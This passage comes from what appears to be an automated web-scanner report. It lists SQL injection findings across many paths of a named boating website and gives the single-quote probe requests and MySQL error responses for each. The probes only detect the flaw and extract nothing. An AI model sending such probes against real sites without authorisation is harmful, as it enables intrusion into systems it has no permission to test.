The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /advertise?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /advertise?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.45. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/archives

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /archives?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /archives?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.46. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.47. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/know-how

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/know-how?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/know-how?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.48. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/new-boats

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/new-boats?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/new-boats?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.49. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/new-gear

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/new-gear?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/new-gear?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.50. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/on-powerboats

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/on-powerboats?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/on-powerboats?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

1.51. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/on-sailboats

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/on-sailboats?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/on-sailboats?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.52. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/q-a-a

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/q-a-a?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/q-a-a?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.53. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/sea-savvy

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/sea-savvy?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

